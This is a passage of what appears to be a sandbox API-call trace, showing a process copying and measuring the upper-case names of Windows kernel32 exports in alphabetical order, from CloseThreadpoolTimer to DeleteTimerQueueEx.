returned 17 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.480] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.480] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.480] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.480] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.480] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.480] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.480] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.481] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.481] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.481] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.481] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.481] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.481] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.481] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.481] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.481] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.481] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.481] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.481] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.481] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.481] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.481] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.481] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.481] lstrlenA (lpString="COPYFILEA") returned 9 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.481] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.481] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.482] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.482] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.482] lstrlenA (lpString="COPYFILEW") returned 9 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.482] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.482] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.482] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.482] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.482] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.482] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.482] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.482] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.482] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.482] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.482] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.482] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.482] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.482] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.482] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.483] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.483] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.483] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.483] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.483] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.483] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.483] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.483] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.483] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.483] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.483] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.483] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.483] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.483] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.483] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.483] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.483] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.483] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.484] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.484] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.484] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.484] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.484] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.484] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.484] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.484] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.484] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.484] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.484] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.484] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.484] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.484] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.484] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.484] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.484] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.484] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.485] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.485] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.485] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.485] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.485] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.485] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.485] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.485] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.485] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.485] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.485] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.485] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.485] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.485] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.485] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.485] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.485] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.485] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.485] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.486] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.486] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.486] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.486] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.486] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.486] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.486] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.486] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.486] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.486] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.486] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.486] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.486] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.486] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.486] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.486] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.486] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.486] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.487] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.487] lstrlenA (lpString="DELETEATOM") returned 10 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.487] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.487] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.487] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.487] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.487] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.487] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.487] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.487] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.487] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") 